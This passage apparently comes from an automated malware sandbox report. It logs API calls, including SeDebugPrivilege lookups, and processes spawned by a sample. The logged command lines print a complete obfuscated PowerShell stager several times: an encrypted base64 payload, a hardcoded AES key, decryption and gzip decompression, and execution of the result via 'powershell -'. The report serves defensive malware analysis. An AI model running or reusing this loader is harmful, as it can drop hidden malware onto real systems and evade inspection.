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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell - } filepath: powershell.exe	1	1
ShellExecuteExW April 18, 2023, 9:51 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell - filepath: C:\Windows\System32\cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 18, 2023, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\system32\cmd.exe" /c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell -
parent_process	powershell.exe				martian_process	C:\Windows\System32\cmd.exe /c powershell.exe $czJl = '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